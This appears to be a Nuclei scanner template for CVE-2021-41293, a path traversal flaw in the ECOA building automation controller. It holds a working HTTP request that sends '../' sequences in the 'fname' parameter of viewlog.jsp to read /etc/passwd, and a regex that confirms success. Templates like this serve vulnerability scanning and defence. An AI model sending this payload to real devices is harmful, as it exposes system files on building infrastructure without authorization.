id: CVE-2021-41293 info: name: ECOA Building Automation System - Local File Disclosure author: 0x_Akoko severity: high description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 tags: cve,cve2021,ecoa,lfi,disclosure requests: - raw: - | POST /viewlog.jsp HTTP/1.1 Host: {{Hostname}} yr=2021&mh=6&fname=../../../../../../../../etc/passwd matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/03/07